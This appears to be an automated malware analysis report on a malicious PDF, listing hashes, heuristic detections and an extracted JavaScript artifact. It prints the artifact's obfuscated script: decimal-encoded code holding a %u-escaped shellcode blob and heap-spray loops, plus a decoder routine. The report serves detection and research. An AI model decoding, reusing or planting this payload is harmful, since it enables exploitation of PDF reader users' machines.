Malicious PDF — malware analysis report

Static analysis result for SHA-256 b6ffd16842cb4962…

MALICIOUS

PDF

2.4 KB First seen: 2026-05-08
MD5: 5be08ed06ee44a0b999c6936405ddabc SHA-1: 7f59967d424f5c500a36125699ffdb8de800fb04 SHA-256: b6ffd16842cb4962f3c629afa3753548441696a24d62d7ba393b77fb52d8dab7
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

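The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics, and that JavaScript is obfuscated: the PDF_JS_EXPLOIT_CLUSTER rule matched a String.fromCharCode decoding loop. The extracted artifact 'javascript_obj0005_000.js' is also flagged for script obfuscation. The likely intent of this script is to download and execute a second-stage payload, although the exact mechanism cannot be determined due to obfuscation. The encoding in the script preview below is shallow: `sourceCode` is a comma-separated list of decimal character codes, and if `decrypt` is applied with an offset of 0, the visible values decode to two `unescape("%u…")` strings, a loop that doubles one of them past 1,048,544 characters, and a second loop that stores 128 padded copies in an array named `memory`. That layout is consistent with heap-spray staging for a memory-corruption exploit in the PDF reader; what the %u-encoded blob does once it runs cannot be read from the static text. The preview shows no call to `decrypt` and no PowerShell content, so the T1059.001 mapping and the download-and-execute assessment should be confirmed against the full sample.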

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is a high-confidence indicator of malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0005_000.js | pdf-javascript-stream | PDF /JS object 5 at offset 0x107 | 7452 bytes
SHA-256: 28daf9da9b450eedb19e2a8838cb1b5b8c0c7f2925fcd2b8c0497515850812c8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "10,118,97,114,32,66,81,101,101,79,116,116,113,86,106,115,72,114,117,119,79,73,87,83,113,65,104,74,86,97,102,66,79,74,118,87,118,87,85,67,88,115,105,75,101,118,108,82,78,120,106,79,107,101,117,112,110,109,80,79,115,108,67,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,100,56,98,98,37,117,56,100,51,48,37,117,51,49,51,98,37,117,98,49,99,57,37,117,100,97,53,102,37,117,100,57,99,56,37,117,50,52,55,52,37,117,53,102,102,52,37,117,53,102,51,49,37,117,56,51,48,101,37,117,102,99,101,102,37,117,56,55,48,51,37,117,54,102,51,97,37,117,100,99,99,101,37,117,51,53,50,98,37,117,49,49,55,98,37,117,97,102,56,53,37,117,54,57,99,50,37,117,98,48,49,52,37,117,57,98,48,49,37,117,53,50,56,102,37,117,55,48,57,51,37,117,55,97,97,97,37,117,55,57,56,102,37,117,56,53,52,97,37,117,99,57,50,48,37,117,101,51,50,99,37,117,49,50,53,56,37,117,50,99,98,51,37,117,48,100,102,50,37,117,100,52,100,53,37,117,102,52,49,54,37,117,102,52,55,51,37,117,56,51,102,102,37,117,101,98,52,56,37,117,49,97,50,54,37,117,52,97,97,50,37,117,102,54,99,98,37,117,53,101,54,54,37,117,56,49,48,54,37,117,99,53,56,56,37,117,57,102,98,50,37,117,52,51,97,100,37,117,102,100,100,56,37,117,54,51,50,51,37,117,97,98,53,48,37,117,52,52,51,48,37,117,54,51,97,53,37,117,102,99,97,97,37,117,49,49,97,48,37,117,54,98,100,57,37,117,52,50,50,54,37,117,48,49,49,100,37,117,56,49,102,55,37,117,49,54,48,102,37,117,52,51,99,49,37,117,48,97,54,101,37,117,48,56,49,50,37,117,102,52,102,101,37,117,50,57,54,100,37,117,97,48,101,99,37,117,54,97,54,51,37,117,100,51,97,99,37,117,100,99,100,101,37,117,55,57,98,55,37,117,55,54,56,54,37,117,56,49,49,55,37,117,49,55,50,53,37,117,97,50,56,97,37,117,56,100,99,102,37,117,48,52,102,49,37,117,50,97,97,56,37,117,101,100,57,102,37,117,100,53,53,97,37,117,53,55,51,97,37,117,56,54,52,57,37,117,48,54,50,56,37,117,49,55,55,55,37,117,99,52,100,97,37,117,53,52,99,101,37,117,50,56,55,57,37,117,53,51,97,49,37,117,51,48,49,98,37,117,55,57,100,98,37,117,100,55,52,51,37,117,98,50,49,55,37,117,49,57,49,100,37,11
7,56,102,99,50,37,117,101,52,102,48,37,117,57,55,102,101,37,117,57,55,51,53,37,117,51,101,97,52,37,117,99,49,50,99,37,117,49,102,98,102,37,117,51,100,99,53,37,117,56,54,54,48,37,117,100,56,55,101,37,117,100,98,55,51,37,117,55,52,57,57,37,117,100,99,57,50,37,117,102,102,56,48,37,117,102,48,49,99,37,117,48,99,102,49,37,117,51,101,101,55,37,117,51,99,57,102,37,117,101,48,54,100,37,117,53,98,102,100,37,117,101,52,52,98,37,117,97,55,52,57,37,117,99,57,48,97,37,117,99,53,50,99,37,117,48,100,53,50,37,117,54,102,99,57,37,117,98,52,51,101,37,117,52,54,50,51,37,117,56,57,102,53,37,117,51,102,55,100,37,117,55,48,99,52,37,117,56,53,54,99,37,117,98,48,49,49,37,117,99,98,102,54,37,117,56,100,99,98,37,117,49,100,57,49,37,117,97,55,54,54,37,117,57,55,48,55,37,117,101,101,54,53,37,117,98,55,53,98,37,117,100,98,53,100,37,117,102,50,54,98,37,117,57,48,51,56,37,117,99,51,98,48,37,117,53,100,102,55,37,117,54,101,52,48,37,117,102,98,97,101,37,117,100,49,100,102,37,117,57,100,51,55,37,117,102,48,55,57,37,117,56,99,52,52,37,117,101,55,52,102,37,117,98,52,52,51,37,117,48,53,56,56,37,117,97,51,53,54,37,117,49,99,100,53,37,117,97,97,52,51,37,117,49,100,102,56,37,117,48,54,55,57,37,117,51,52,101,52,37,117,54,97,54,102,37,117,49,53,49,49,37,117,55,57,56,48,37,117,53,99,50,54,37,117,56,98,56,99,37,117,52,49,51,99,37,117,101,97,57,55,37,117,55,50,48,100,37,117,100,48,100,102,37,117,56,102,55,51,37,117,55,49,100,97,37,117,57,49,97,102,37,117,54,99,101,98,37,117,97,51,57,100,37,117,57,50,101,55,37,117,98,57,101,54,37,117,98,102,54,49,37,117,98,97,101,49,37,117,101,97,54,102,37,117,99,48,102,101,37,117,101,99,55,98,37,117,100,54,49,52,37,117,57,53,97,52,37,117,102,99,48,55,37,117,53,49,97,48,37,117,102,52,50,49,37,117,53,53,100,50,37,117,50,101,48,53,37,117,57,51,51,57,37,117,50,54,55,52,37,117,97,100,51,55,37,117,51,52,55,49,37,117,97,55,55,53,37,117,51,55,53,100,37,117,98,98,55,51,37,117,50,49,98,97,37,117,51,55,49,52,37,117,50,50,52,102,37,117,57,56,100,102,37,117,98,53,56,48,37,117,57,49,54,56,3
7,117,53,101,102,48,37,117,50,57,102,54,37,117,99,101,54,53,37,117,98,52,57,53,37,117,55,51,53,98,37,117,53,98,48,57,37,117,51,53,56,98,37,117,102,53,57,57,37,117,100,48,57,55,37,117,57,99,53,51,37,117,53,55,55,52,37,117,51,98,98,97,37,117,102,50,48,51,37,117,52,49,52,50,34,41,59,10,118,97,114,32,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,50,52,54,37,117,51,55,50,102,34,41,59,10,10,119,104,105,108,101,32,40,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,46,108,101,110,103,116,104,32,60,32,49,48,52,56,53,52,52,41,10,32,32,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,32,43,61,32,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,59,10,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,32,61,32,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,
81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,46,115,117,98,115,116,114,105,110,103,40,48,44,32,49,48,52,56,53,52,52,32,45,32,66,81,101,101,79,116,116,113,86,106,115,72,114,117,119,79,73,87,83,113,65,104,74,86,97,102,66,79,74,118,87,118,87,85,67,88,115,105,75,101,118,108,82,78,120,106,79,107,101,117,112,110,109,80,79,115,108,67,46,108,101,110,103,116,104,41,59,10,109,101,109,111,114,121,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,10,102,111,114,40,105,32,61,32,48,59,32,105,32,60,32,49,50,56,59,32,105,43,43,41,10,123,10,9,109,101,109,111,114,121,91,105,93,61,32,120,74,105,101,98,98,111,80,121,117,71,109,116,78,90,73,81,80,87,100,68,83,86,119,101,81,66,90,113,108,84,102,86,101,74,122,80,87,110,118,78,86,115,80,81,69,101,77,90,119,76,88,116,86,89,87,86,98,105,110,79,104,101,72,117,108,106,76,114,110,101,83,120,113,98,119,76,113,83,83,90,32,43,32,66,81,101,101,79,116,116,113,86,106,115,72,114,117,119,79,73,87,83,113,65,104,74,86,97,102,66,79,74,118,87,118,87,85,67,88,115,105,75,101,118,108,82,78,120,106,79,107,101,117,112,110,109,80,79,115,108,67,59,10,125,10"; 
/**
 * Decode a comma-separated list of decimal character codes into text.
 *
 * Each token has `jump` subtracted from it and the result is passed to
 * String.fromCharCode, so the encoding is a fixed numeric offset and not
 * encryption, despite the function's name. The function only builds and
 * returns a string; nothing in it evaluates the decoded text.
 *
 * NOTE(review): the call site is not part of this listing, so the `jump`
 * value used by the sample is not visible here. Presumably the input is
 * the `sourceCode` string defined above; confirm against the full script.
 *
 * @param {string} str  Comma-separated decimal values.
 * @param {number} jump Offset removed from every value before conversion.
 * @returns {string} The decoded text, one UTF-16 code unit per token.
 */
function decrypt(str, jump) {
    var codes = str.split(',');
    var chars = [];
    var idx = 0;
    while (idx < codes.length) {
        // The subtraction coerces the string token to a number first.
        chars.push(String.fromCharCode(codes[idx] - jump));
        idx += 1;
    }
    return chars.join('');
}